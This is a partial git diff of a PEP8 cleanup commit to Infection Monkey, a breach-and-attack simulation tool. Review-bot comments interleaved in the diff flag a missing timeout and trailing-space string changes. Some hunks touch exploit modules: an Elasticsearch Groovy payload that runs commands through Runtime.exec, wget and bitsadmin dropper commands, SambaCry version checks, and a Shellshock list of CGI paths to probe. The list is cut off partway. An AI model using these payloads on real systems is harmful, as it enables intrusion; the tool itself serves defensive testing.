 monkey/infection_monkey/network/smbfinger.py | 10 +-
 .../infection_monkey/network/tcp_scanner.py | 3 +-
 .../system_info/SSH_info_collector.py | 2 +-
 monkey/infection_monkey/transport/base.py | 2 +-
 monkey/monkey_island/cc/models/test_monkey.py | 2 +-
 monkey/monkey_island/cc/resources/root.py | 8 +-
 .../cc/services/attack/attack_report.py | 5 +-
 monkey/monkey_island/cc/services/config.py | 15 +-
 .../cc/services/remote_run_aws.py | 2 +-
 .../cc/services/reporting/aws_exporter.py | 107 ++-
 .../cc/services/reporting/pth_report.py | 21 +-
 monkey/monkey_island/cc/utils.py | 11 +-
 28 files changed, 593 insertions(+), 527 deletions(-)
diff --git a/monkey/common/cloud/aws_instance.py b/monkey/common/cloud/aws_instance.py
index ac4fe633e..5178b0938 100644
--- a/monkey/common/cloud/aws_instance.py
+++ b/monkey/common/cloud/aws_instance.py
@@ -29,8 +29,8 @@ class AwsInstance(object):
             self.instance_id = urllib.request.urlopen(
                 AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
             self.region = self._parse_region(
-                urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().
-                decode())
+                urllib.request.urlopen(
+                    AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
         except (urllib.error.URLError, IOError) as e:
             logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
 
diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py
index 9745d2c1d..459a42129 100644
--- a/monkey/common/cmd/aws/aws_cmd_runner.py
+++ b/monkey/common/cmd/aws/aws_cmd_runner.py
@@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner):
     Class for running commands on a remote AWS machine
     """
 
-    def __init__(self, is_linux, instance_id, region = None):
+    def __init__(self, is_linux, instance_id, region=None):
         super(AwsCmdRunner, self).__init__(is_linux)
         self.instance_id = instance_id
         self.region = region
diff --git a/monkey/common/data/zero_trust_consts.py b/monkey/common/data/zero_trust_consts.py
index 5ac5dd78d..ae27b1c35 100644
--- a/monkey/common/data/zero_trust_consts.py
+++ b/monkey/common/data/zero_trust_consts.py
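Review bot: The re-wrapped `urllib.request.urlopen(` call for `meta-data/placement/availability-zone` still carries no `timeout`, while the `instance-id` request two lines above passes `timeout=2`; if the metadata endpoint accepts the connection but never answers, `AwsInstance` construction blocks indefinitely, and the `except (urllib.error.URLError, IOError)` clause only covers errors, not hangs. Since this line is being rewritten anyway, giving it the same bound keeps the two calls consistent: `AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone', timeout=2).read().decode())`. The enclosing `try` and `__init__` begin outside the hunk.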
@@ -68,7 +68,8 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
 TEST_EXPLANATION_KEY = "explanation"
 TESTS_MAP = {
     TEST_SEGMENTATION: {
-        TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
+        TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
+                              "running on, that belong to different network segments.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
             STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
@@ -78,7 +79,8 @@ TESTS_MAP = {
         POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
     },
     TEST_MALICIOUS_ACTIVITY_TIMELINE: {
-        TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
+        TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
+                              "exploitation.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
         },
@@ -89,8 +91,10 @@ TESTS_MAP = {
     TEST_ENDPOINT_SECURITY_EXISTS: {
         TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
-            STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
+            STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
+                           "software on endpoints.",
+            STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
+                           "security concern. "
         },
         PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
         PILLARS_KEY: [DEVICES],
@@ -99,7 +103,8 @@ TESTS_MAP = {
     TEST_MACHINE_EXPLOITED: {
         TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
+            STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
+                           "which endpoints were compromised.",
             STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
         },
         PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
@@ -109,7 +114,8 @@ TESTS_MAP = {
     TEST_SCHEDULED_EXECUTION: {
         TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
+            STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
+                           "software.",
             STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
         },
         PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
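Review bot: The re-wrapped `STATUS_PASSED` text for `TEST_ENDPOINT_SECURITY_EXISTS` now ends in `"security concern. "`, a trailing space the original single-line literal (`... security concern."`) did not have, so a commit described as whitespace-and-imports changes a user-facing string. The same trailing space is introduced in the three hunks that follow in this file (`@@ -120`, `@@ -130`, `@@ -139`): `"that indicate attempts to access them. "`, `"attempts to access them. "` and `"restrict them. "`. Dropping the space in each continuation literal, e.g. `"security concern."`, keeps the report text byte-identical to what it was before the reformat.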
@@ -120,7 +126,8 @@ TESTS_MAP = {
         TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
-            STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
+            STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
+                           "that indicate attempts to access them. "
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
         PILLARS_KEY: [DATA],
@@ -130,7 +137,8 @@ TESTS_MAP = {
         TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
             STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
-            STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
+            STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
+                           "attempts to access them. "
         },
         PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
         PILLARS_KEY: [DATA],
@@ -139,7 +147,8 @@ TESTS_MAP = {
     TEST_TUNNELING: {
         TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
         FINDING_EXPLANATION_BY_STATUS_KEY: {
-            STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
+            STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
+                           "restrict them. "
         },
         PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
         PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
@@ -148,7 +157,8 @@ TESTS_MAP = { TEST_COMMUNICATE_AS_NEW_USER: { TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.", FINDING_EXPLANATION_BY_STATUS_KEY: { - STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.", + STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - " + "restrict them to MAC only.", STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network." }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, diff --git a/monkey/common/utils/code_utils.py b/monkey/common/utils/code_utils.py index d6d407706..b50e01fb0 100644 --- a/monkey/common/utils/code_utils.py +++ b/monkey/common/utils/code_utils.py @@ -1,10 +1,12 @@ # abstract, static method decorator +# noinspection PyPep8Naming class abstractstatic(staticmethod): __slots__ = () def __init__(self, function): super(abstractstatic, self).__init__(function) function.__isabstractmethod__ = True + __isabstractmethod__ = True diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index f1057f2dd..c8f897dd2 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -26,8 +26,8 @@ class ElasticGroovyExploiter(WebRCE): # attack URLs MONKEY_RESULT_FIELD = "monkey_result" GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_CMD = GENERIC_QUERY \ - % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + JAVA_CMD = \ + GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" _TARGET_OS_TYPE = ['linux', 'windows'] _EXPLOITED_SERVICE = 'Elastic search' 
@@ -39,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
         exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
         exploit_config['dropper'] = True
         exploit_config['url_extensions'] = ['_search?pretty']
-        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP}
+        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP}
         return exploit_config
 
     def get_open_service_ports(self, port_list, names):
diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py
index e48a21616..3c12ab843 100644
--- a/monkey/infection_monkey/exploit/sambacry.py
+++ b/monkey/infection_monkey/exploit/sambacry.py
@@ -230,13 +230,13 @@ class SambaCryExploiter(HostExploiter):
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
             is_vulnerable = True
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
-                    samba_version_parts[1] <= "13"):
+                samba_version_parts[1] <= "13"):
             is_vulnerable = True
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
-                    samba_version_parts[1] <= "9"):
+                samba_version_parts[1] <= "9"):
             is_vulnerable = True
         elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
-                    samba_version_parts[1] <= "3"):
+                samba_version_parts[1] <= "3"):
             is_vulnerable = True
         else:
             # If pattern doesn't match we can't tell what version it is. Better try
@@ -448,7 +448,12 @@ class SambaCryExploiter(HostExploiter):
             return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
         else:
-            return SambaCryExploiter.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA,
-                                                shareMode=FILE_SHARE_READ,
-                                                creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE,
-                                                fileAttributes=0)
+            return SambaCryExploiter.create_smb(
+                smb_client,
+                treeId,
+                pathName,
+                desiredAccess=FILE_READ_DATA,
+                shareMode=FILE_SHARE_READ,
+                creationOptions=FILE_OPEN,
+                creationDisposition=FILE_NON_DIRECTORY_FILE,
+                fileAttributes=0)
diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py
index 10cfc75a6..46851dde1 100644
--- a/monkey/infection_monkey/exploit/shellshock_resources.py
+++ b/monkey/infection_monkey/exploit/shellshock_resources.py
@@ -1,406 +1,408 @@ # resource for shellshock attack # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list -CGI_FILES = (r'/', - r'/admin.cgi', - r'/administrator.cgi', - r'/agora.cgi', - r'/aktivate/cgi-bin/catgy.cgi', - r'/analyse.cgi', - r'/apps/web/vs_diag.cgi', - r'/axis-cgi/buffer/command.cgi', - r'/b2-include/b2edit.showposts.php', - r'/bandwidth/index.cgi', - r'/bigconf.cgi', - r'/cartcart.cgi', - r'/cart.cgi', - r'/ccbill/whereami.cgi', - r'/cgi-bin/14all-1.1.cgi', - r'/cgi-bin/14all.cgi', - r'/cgi-bin/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp4.cgi', - r'/cgi-bin/addbanner.cgi', - r'/cgi-bin/add_ftp.cgi', - r'/cgi-bin/adduser.cgi', - r'/cgi-bin/admin/admin.cgi', - r'/cgi-bin/admin.cgi', - r'/cgi-bin/admin/getparam.cgi', - r'/cgi-bin/adminhot.cgi', - r'/cgi-bin/admin.pl', - r'/cgi-bin/admin/setup.cgi', - r'/cgi-bin/adminwww.cgi', - r'/cgi-bin/af.cgi', - r'/cgi-bin/aglimpse.cgi', - r'/cgi-bin/alienform.cgi', - r'/cgi-bin/AnyBoard.cgi', - r'/cgi-bin/architext_query.cgi', - r'/cgi-bin/astrocam.cgi', - r'/cgi-bin/AT-admin.cgi', - r'/cgi-bin/AT-generate.cgi', - r'/cgi-bin/auction/auction.cgi', - r'/cgi-bin/auktion.cgi', - r'/cgi-bin/ax-admin.cgi', - r'/cgi-bin/ax.cgi', - r'/cgi-bin/axs.cgi', - r'/cgi-bin/badmin.cgi', - r'/cgi-bin/banner.cgi', - r'/cgi-bin/bannereditor.cgi', - r'/cgi-bin/bb-ack.sh', - r'/cgi-bin/bb-histlog.sh', - r'/cgi-bin/bb-hist.sh', - r'/cgi-bin/bb-hostsvc.sh', - r'/cgi-bin/bb-replog.sh', - r'/cgi-bin/bb-rep.sh', - r'/cgi-bin/bbs_forum.cgi', - r'/cgi-bin/bigconf.cgi', - r'/cgi-bin/bizdb1-search.cgi', - r'/cgi-bin/blog/mt-check.cgi', - r'/cgi-bin/blog/mt-load.cgi', - r'/cgi-bin/bnbform.cgi', - r'/cgi-bin/book.cgi', - r'/cgi-bin/boozt/admin/index.cgi', - r'/cgi-bin/bsguest.cgi', - r'/cgi-bin/bslist.cgi', - r'/cgi-bin/build.cgi', - r'/cgi-bin/bulk/bulk.cgi', - r'/cgi-bin/cached_feed.cgi', - r'/cgi-bin/cachemgr.cgi', - r'/cgi-bin/calendar/index.cgi', - 
r'/cgi-bin/cartmanager.cgi', - r'/cgi-bin/cbmc/forums.cgi', - r'/cgi-bin/ccvsblame.cgi', - r'/cgi-bin/c_download.cgi', - r'/cgi-bin/cgforum.cgi', - r'/cgi-bin/.cgi', - r'/cgi-bin/cgi_process', - r'/cgi-bin/classified.cgi', - r'/cgi-bin/classifieds.cgi', - r'/cgi-bin/classifieds/classifieds.cgi', - r'/cgi-bin/classifieds/index.cgi', - r'/cgi-bin/.cobalt/alert/service.cgi', - r'/cgi-bin/.cobalt/message/message.cgi', - r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', - r'/cgi-bin/commandit.cgi', - r'/cgi-bin/commerce.cgi', - r'/cgi-bin/common/listrec.pl', - r'/cgi-bin/compatible.cgi', - r'/cgi-bin/Count.cgi', - r'/cgi-bin/csChatRBox.cgi', - r'/cgi-bin/csGuestBook.cgi', - r'/cgi-bin/csLiveSupport.cgi', - r'/cgi-bin/CSMailto.cgi', - r'/cgi-bin/CSMailto/CSMailto.cgi', - r'/cgi-bin/csNews.cgi', - r'/cgi-bin/csNewsPro.cgi', - r'/cgi-bin/csPassword.cgi', - r'/cgi-bin/csPassword/csPassword.cgi', - r'/cgi-bin/csSearch.cgi', - r'/cgi-bin/csv_db.cgi', - r'/cgi-bin/cvsblame.cgi', - r'/cgi-bin/cvslog.cgi', - r'/cgi-bin/cvsquery.cgi', - r'/cgi-bin/cvsqueryform.cgi', - r'/cgi-bin/day5datacopier.cgi', - r'/cgi-bin/day5datanotifier.cgi', - r'/cgi-bin/db_manager.cgi', - r'/cgi-bin/dbman/db.cgi', - r'/cgi-bin/dcforum.cgi', - r'/cgi-bin/dcshop.cgi', - r'/cgi-bin/dfire.cgi', - r'/cgi-bin/diagnose.cgi', - r'/cgi-bin/dig.cgi', - r'/cgi-bin/directorypro.cgi', - r'/cgi-bin/download.cgi', - r'/cgi-bin/e87_Ba79yo87.cgi', - r'/cgi-bin/emu/html/emumail.cgi', - r'/cgi-bin/emumail.cgi', - r'/cgi-bin/emumail/emumail.cgi', - r'/cgi-bin/enter.cgi', - r'/cgi-bin/environ.cgi', - r'/cgi-bin/ezadmin.cgi', - r'/cgi-bin/ezboard.cgi', - r'/cgi-bin/ezman.cgi', - r'/cgi-bin/ezshopper2/loadpage.cgi', - r'/cgi-bin/ezshopper3/loadpage.cgi', - r'/cgi-bin/ezshopper/loadpage.cgi', - r'/cgi-bin/ezshopper/search.cgi', - r'/cgi-bin/faqmanager.cgi', - r'/cgi-bin/FileSeek2.cgi', - r'/cgi-bin/FileSeek.cgi', - r'/cgi-bin/finger.cgi', - r'/cgi-bin/flexform.cgi', - r'/cgi-bin/fom.cgi', - r'/cgi-bin/fom/fom.cgi', - 
r'/cgi-bin/FormHandler.cgi', - r'/cgi-bin/FormMail.cgi', - r'/cgi-bin/gbadmin.cgi', - r'/cgi-bin/gbook/gbook.cgi', - r'/cgi-bin/generate.cgi', - r'/cgi-bin/getdoc.cgi', - r'/cgi-bin/gH.cgi', - r'/cgi-bin/gm-authors.cgi', - r'/cgi-bin/gm.cgi', - r'/cgi-bin/gm-cplog.cgi', - r'/cgi-bin/guestbook.cgi', - r'/cgi-bin/handler', - r'/cgi-bin/handler.cgi', - r'/cgi-bin/handler/netsonar', - r'/cgi-bin/hitview.cgi', - r'/cgi-bin/hsx.cgi', - r'/cgi-bin/html2chtml.cgi', - r'/cgi-bin/html2wml.cgi', - r'/cgi-bin/htsearch.cgi', - r'/cgi-bin/hw.sh', # testing - r'/cgi-bin/icat', - r'/cgi-bin/if/admin/nph-build.cgi', - r'/cgi-bin/ikonboard/help.cgi', - r'/cgi-bin/ImageFolio/admin/admin.cgi', - r'/cgi-bin/imageFolio.cgi', - r'/cgi-bin/index.cgi', - r'/cgi-bin/infosrch.cgi', - r'/cgi-bin/jammail.pl', - r'/cgi-bin/journal.cgi', - r'/cgi-bin/lastlines.cgi', - r'/cgi-bin/loadpage.cgi', - r'/cgi-bin/login.cgi', - r'/cgi-bin/logit.cgi', - r'/cgi-bin/log-reader.cgi', - r'/cgi-bin/lookwho.cgi', - r'/cgi-bin/lwgate.cgi', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/magiccard.cgi', - r'/cgi-bin/mail/emumail.cgi', - r'/cgi-bin/maillist.cgi', - r'/cgi-bin/mailnews.cgi', - r'/cgi-bin/mail/nph-mr.cgi', - r'/cgi-bin/main.cgi', - r'/cgi-bin/main_menu.pl', - r'/cgi-bin/man.sh', - r'/cgi-bin/mini_logger.cgi', - r'/cgi-bin/mmstdod.cgi', - r'/cgi-bin/moin.cgi', - r'/cgi-bin/mojo/mojo.cgi', - r'/cgi-bin/mrtg.cgi', - r'/cgi-bin/mt.cgi', - r'/cgi-bin/mt/mt.cgi', - r'/cgi-bin/mt/mt-check.cgi', - r'/cgi-bin/mt/mt-load.cgi', - r'/cgi-bin/mt-static/mt-check.cgi', - r'/cgi-bin/mt-static/mt-load.cgi', - r'/cgi-bin/musicqueue.cgi', - r'/cgi-bin/myguestbook.cgi', - r'/cgi-bin/.namazu.cgi', - r'/cgi-bin/nbmember.cgi', - r'/cgi-bin/netauth.cgi', - r'/cgi-bin/netpad.cgi', - r'/cgi-bin/newsdesk.cgi', - r'/cgi-bin/nlog-smb.cgi', - r'/cgi-bin/nph-emumail.cgi', - r'/cgi-bin/nph-exploitscanget.cgi', - r'/cgi-bin/nph-publish.cgi', - r'/cgi-bin/nph-test.cgi', - r'/cgi-bin/pagelog.cgi', - 
r'/cgi-bin/pbcgi.cgi', - r'/cgi-bin/perlshop.cgi', - r'/cgi-bin/pfdispaly.cgi', - r'/cgi-bin/pfdisplay.cgi', - r'/cgi-bin/phf.cgi', - r'/cgi-bin/photo/manage.cgi', - r'/cgi-bin/photo/protected/manage.cgi', - r'/cgi-bin/php-cgi', - r'/cgi-bin/php.cgi', - r'/cgi-bin/php.fcgi', - r'/cgi-bin/ping.sh', - r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', - r'/cgi-bin/pollssi.cgi', - r'/cgi-bin/postcards.cgi', - r'/cgi-bin/powerup/r.cgi', - r'/cgi-bin/printenv', - r'/cgi-bin/probecontrol.cgi', - r'/cgi-bin/profile.cgi', - r'/cgi-bin/publisher/search.cgi', - r'/cgi-bin/quickstore.cgi', - r'/cgi-bin/quizme.cgi', - r'/cgi-bin/ratlog.cgi', - r'/cgi-bin/r.cgi', - r'/cgi-bin/register.cgi', - r'/cgi-bin/replicator/webpage.cgi/', - r'/cgi-bin/responder.cgi', - r'/cgi-bin/robadmin.cgi', - r'/cgi-bin/robpoll.cgi', - r'/cgi-bin/rtpd.cgi', - r'/cgi-bin/sbcgi/sitebuilder.cgi', - r'/cgi-bin/scoadminreg.cgi', - r'/cgi-bin-sdb/printenv', - r'/cgi-bin/sdbsearch.cgi', - r'/cgi-bin/search', - r'/cgi-bin/search.cgi', - r'/cgi-bin/search/search.cgi', - r'/cgi-bin/sendform.cgi', - r'/cgi-bin/shop.cgi', - r'/cgi-bin/shopper.cgi', - r'/cgi-bin/shopplus.cgi', - r'/cgi-bin/showcheckins.cgi', - r'/cgi-bin/simplestguest.cgi', - r'/cgi-bin/simplestmail.cgi', - r'/cgi-bin/smartsearch.cgi', - r'/cgi-bin/smartsearch/smartsearch.cgi', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/sojourn.cgi', - r'/cgi-bin/spin_client.cgi', - r'/cgi-bin/start.cgi', - r'/cgi-bin/status', - r'/cgi-bin/status_cgi', - r'/cgi-bin/store/agora.cgi', - r'/cgi-bin/store.cgi', - r'/cgi-bin/store/index.cgi', - r'/cgi-bin/survey.cgi', - r'/cgi-bin/sync.cgi', - r'/cgi-bin/talkback.cgi', - r'/cgi-bin/technote/main.cgi', - r'/cgi-bin/test2.pl', - r'/cgi-bin/test-cgi', - r'/cgi-bin/test.cgi', - r'/cgi-bin/testing_whatever', - r'/cgi-bin/test/test.cgi', - r'/cgi-bin/tidfinder.cgi', - r'/cgi-bin/tigvote.cgi', - r'/cgi-bin/title.cgi', - r'/cgi-bin/top.cgi', - 
r'/cgi-bin/traffic.cgi', - r'/cgi-bin/troops.cgi', - r'/cgi-bin/ttawebtop.cgi/', - r'/cgi-bin/ultraboard.cgi', - r'/cgi-bin/upload.cgi', - r'/cgi-bin/urlcount.cgi', - r'/cgi-bin/viewcvs.cgi', - r'/cgi-bin/view_help.cgi', - r'/cgi-bin/viralator.cgi', - r'/cgi-bin/virgil.cgi', - r'/cgi-bin/vote.cgi', - r'/cgi-bin/vpasswd.cgi', - r'/cgi-bin/way-board.cgi', - r'/cgi-bin/way-board/way-board.cgi', - r'/cgi-bin/webbbs.cgi', - r'/cgi-bin/webcart/webcart.cgi', - r'/cgi-bin/webdist.cgi', - r'/cgi-bin/webif.cgi', - r'/cgi-bin/webmail/html/emumail.cgi', - r'/cgi-bin/webmap.cgi', - r'/cgi-bin/webspirs.cgi', - r'/cgi-bin/Web_Store/web_store.cgi', - r'/cgi-bin/whois.cgi', - r'/cgi-bin/whois_raw.cgi', - r'/cgi-bin/whois/whois.cgi', - r'/cgi-bin/wrap', - r'/cgi-bin/wrap.cgi', - r'/cgi-bin/wwwboard.cgi.cgi', - r'/cgi-bin/YaBB/YaBB.cgi', - r'/cgi-bin/zml.cgi', - r'/cgi-mod/index.cgi', - r'/cgis/wwwboard/wwwboard.cgi', - r'/cgi-sys/addalink.cgi', - r'/cgi-sys/defaultwebpage.cgi', - r'/cgi-sys/domainredirect.cgi', - r'/cgi-sys/entropybanner.cgi', - r'/cgi-sys/entropysearch.cgi', - r'/cgi-sys/FormMail-clone.cgi', - r'/cgi-sys/helpdesk.cgi', - r'/cgi-sys/mchat.cgi', - r'/cgi-sys/randhtml.cgi', - r'/cgi-sys/realhelpdesk.cgi', - r'/cgi-sys/realsignup.cgi', - r'/cgi-sys/signup.cgi', - r'/connector.cgi', - r'/cp/rac/nsManager.cgi', - r'/create_release.sh', - r'/CSNews.cgi', - r'/csPassword.cgi', - r'/dcadmin.cgi', - r'/dcboard.cgi', - r'/dcforum.cgi', - r'/dcforum/dcforum.cgi', - r'/debuff.cgi', - r'/debug.cgi', - r'/details.cgi', - r'/edittag/edittag.cgi', - r'/emumail.cgi', - r'/enter_buff.cgi', - r'/enter_bug.cgi', - r'/ez2000/ezadmin.cgi', - r'/ez2000/ezboard.cgi', - r'/ez2000/ezman.cgi', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo2', - r'/fcgi-bin/echo2', - r'/Gozila.cgi', - r'/hitmatic/analyse.cgi', - r'/hp_docs/cgi-bin/index.cgi', - r'/html/cgi-bin/cgicso', - r'/html/cgi-bin/cgicso', - r'/index.cgi', - r'/info.cgi', - r'/infosrch.cgi', - r'/login.cgi', - 
r'/mailview.cgi', - r'/main.cgi', - r'/megabook/admin.cgi', - r'/ministats/admin.cgi', - r'/mods/apage/apage.cgi', - r'/_mt/mt.cgi', - r'/musicqueue.cgi', - r'/ncbook.cgi', - r'/newpro.cgi', - r'/newsletter.sh', - r'/oem_webstage/cgi-bin/oemapp_cgi', - r'/page.cgi', - r'/parse_xml.cgi', - r'/photodata/manage.cgi', - r'/photo/manage.cgi', - r'/print.cgi', - r'/process_buff.cgi', - r'/process_bug.cgi', - r'/pub/english.cgi', - r'/quikmail/nph-emumail.cgi', - r'/quikstore.cgi', - r'/reviews/newpro.cgi', - r'/ROADS/cgi-bin/search.pl', - r'/sample01.cgi', - r'/sample02.cgi', - r'/sample03.cgi', - r'/sample04.cgi', - r'/sampleposteddata.cgi', - r'/scancfg.cgi', - r'/scancfg.cgi', - r'/servers/link.cgi', - r'/setpasswd.cgi', - r'/SetSecurity.shm', - r'/shop/member_html.cgi', - r'/shop/normal_html.cgi', - r'/site_searcher.cgi', - r'/siteUserMod.cgi', - r'/submit.cgi', - r'/technote/print.cgi', - r'/template.cgi', - r'/test.cgi', - r'/ucsm/isSamInstalled.cgi', - r'/upload.cgi', - r'/userreg.cgi', - r'/users/scripts/submit.cgi', - r'/vood/cgi-bin/vood_view.cgi', - r'/Web_Store/web_store.cgi', - r'/webtools/bonsai/ccvsblame.cgi', - r'/webtools/bonsai/cvsblame.cgi', - r'/webtools/bonsai/cvslog.cgi', - r'/webtools/bonsai/cvsquery.cgi', - r'/webtools/bonsai/cvsqueryform.cgi', - r'/webtools/bonsai/showcheckins.cgi', - r'/wwwadmin.cgi', - r'/wwwboard.cgi', - r'/wwwboard/wwwboard.cgi') \ No newline at end of file +CGI_FILES = ( + r'/', + r'/admin.cgi', + r'/administrator.cgi', + r'/agora.cgi', + r'/aktivate/cgi-bin/catgy.cgi', + r'/analyse.cgi', + r'/apps/web/vs_diag.cgi', + r'/axis-cgi/buffer/command.cgi', + r'/b2-include/b2edit.showposts.php', + r'/bandwidth/index.cgi', + r'/bigconf.cgi', + r'/cartcart.cgi', + r'/cart.cgi', + r'/ccbill/whereami.cgi', + r'/cgi-bin/14all-1.1.cgi', + r'/cgi-bin/14all.cgi', + r'/cgi-bin/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp4.cgi', + r'/cgi-bin/addbanner.cgi', + r'/cgi-bin/add_ftp.cgi', + r'/cgi-bin/adduser.cgi', 
